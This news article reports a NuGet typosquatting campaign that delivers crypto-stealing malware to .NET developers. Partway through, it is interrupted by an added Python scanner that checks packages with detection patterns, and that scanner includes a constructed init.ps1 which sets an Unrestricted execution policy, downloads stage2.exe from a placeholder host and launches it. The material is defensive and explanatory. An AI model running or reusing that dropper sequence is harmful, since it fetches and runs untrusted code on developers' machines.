Threat actors are targeting and infecting .NET developers with cryptocurrency stealers delivered through the NuGet repository and impersonating multiple legitimate packages via typosquatting.
Three of them have been downloaded over 150,000 times within a month, according to JFrog security researchers Natan Nehorai and Brian Moussalli, who spotted this ongoing campaign.
While the large number of downloads may point to a large number of .NET developers who had their systems compromised, it could also be explained by the attackers' efforts to legitimize their malicious NuGet packages.
"The top three packages were downloaded an incredible amount of times – this could be an indicator that the attack was highly successful, infecting a large amount of machines," the JFrog security researchers said.
"However, this is not a fully reliable indicator of the attack's success since the attackers could have automatically inflated the download count (with bots) to make the packages seem more legitimate."
The threat actors also used typosquatting when creating their NuGet repository profiles to impersonate what looked like the accounts of Microsoft software developers working on the NuGet .NET package manager.
The malicious packages are designed to download and execute a PowerShell-based dropper script (init.ps1) that configures the infected machine to allow PowerShell execution without restrictions.
"This behavior is extremely uncommon outside of malicious packages, especially taking into account the "Unrestricted" execution policy, which should immediately trigger a red flag," the researchers explained.
In the next step, it downloads and launches a second-stage payload, a Windows executable described by JFrog as a "completely custom executable payload."
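The install-time behaviour described above (an init.ps1 that relaxes the execution policy to Unrestricted and then fetches and launches a second stage) can be checked for before a package is installed. The following scanner is an added example, not JFrog's tooling or the campaign's script: it treats a .nupkg as the zip archive it is, inspects every PowerShell script inside, and reports which of a small set of indicator patterns each script matches. The indicator regexes and the two sample install scripts are constructed for this illustration.

```python
import io
import re
import zipfile

# Indicator patterns modelled on the dropper behaviour described in the article (constructed, not a vendor signature set).
INDICATORS = {
    "unrestricted_policy": re.compile(r"Set-ExecutionPolicy\s+(?:-ExecutionPolicy\s+)?Unrestricted", re.I),
    "remote_download": re.compile(r"Invoke-WebRequest|DownloadString|DownloadFile|Invoke-RestMethod", re.I),
    "launch_payload": re.compile(r"Start-Process|Invoke-Expression|\biex\b", re.I),
}

def scan_nupkg(data: bytes) -> dict:
    """Return {script path: [matched indicator names]} for every .ps1 inside the package bytes."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(data)) as pkg:
        for name in pkg.namelist():
            if not name.lower().endswith(".ps1"):
                continue
            text = pkg.read(name).decode("utf-8", errors="replace")
            hits = [label for label, rx in INDICATORS.items() if rx.search(text)]
            if hits:
                findings[name] = hits
    return findings

def build_sample_package(init_ps1) -> bytes:
    """Construct an in-memory .nupkg with a minimal nuspec and, if given, a tools/init.ps1 (sample package, not a real one)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as pkg:
        pkg.writestr("Sample.nuspec", "<package><metadata><id>Sample</id></metadata></package>")
        if init_ps1 is not None:
            pkg.writestr("tools/init.ps1", init_ps1)
    return buf.getvalue()

# Constructed dropper-style install script following the steps described above (not the campaign's real script).
SUSPICIOUS_INIT = """param($installPath, $toolsPath, $package)
Set-ExecutionPolicy Unrestricted -Scope CurrentUser -Force
$u = 'https://example.invalid/stage2.exe'
Invoke-WebRequest -Uri $u -OutFile "$env:TEMP\\stage2.exe"
Start-Process "$env:TEMP\\stage2.exe"
"""

# Constructed benign init.ps1 that only loads a module for the Package Manager Console.
BENIGN_INIT = """param($installPath, $toolsPath, $package)
Import-Module (Join-Path $toolsPath 'Sample.psm1')
"""

if __name__ == "__main__":
    for label, script in (("suspicious", SUSPICIOUS_INIT), ("benign", BENIGN_INIT)):
        print(label, scan_nupkg(build_sample_package(script)))
```

Run against real packages by passing the bytes of a downloaded .nupkg to scan_nupkg; a hit on the policy indicator alone is the signal the researchers single out, while download plus launch hits together describe the full dropper chain.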
This is an uncommon approach compared to other attackers, who mostly use open-source hacking tools and commodity malware instead of creating their own payloads.
The malware deployed on compromised systems can be used for stealing cryptocurrency by exfiltrating the victims' crypto wallets using Discord webhooks, extracting and executing malicious code from Electron archives, and auto-updating by querying the attacker-controlled command-and-control (C2) server.
"Some packages did not contain any direct malicious payload. Instead, they defined other malicious packages as dependencies, which then contained the malicious script," the researchers added.
Payloads delivered in this attack have very low detection rates and will not be flagged as malicious by Defender, the built-in anti-malware component in the Microsoft Windows operating system.
This attack is part of a broader malicious effort, with other attackers going as far as uploading more than 144,000 phishing-related packages to multiple open-source package repositories, including NPM, PyPi, and NuGet, as part of a large-scale campaign active throughout 2022.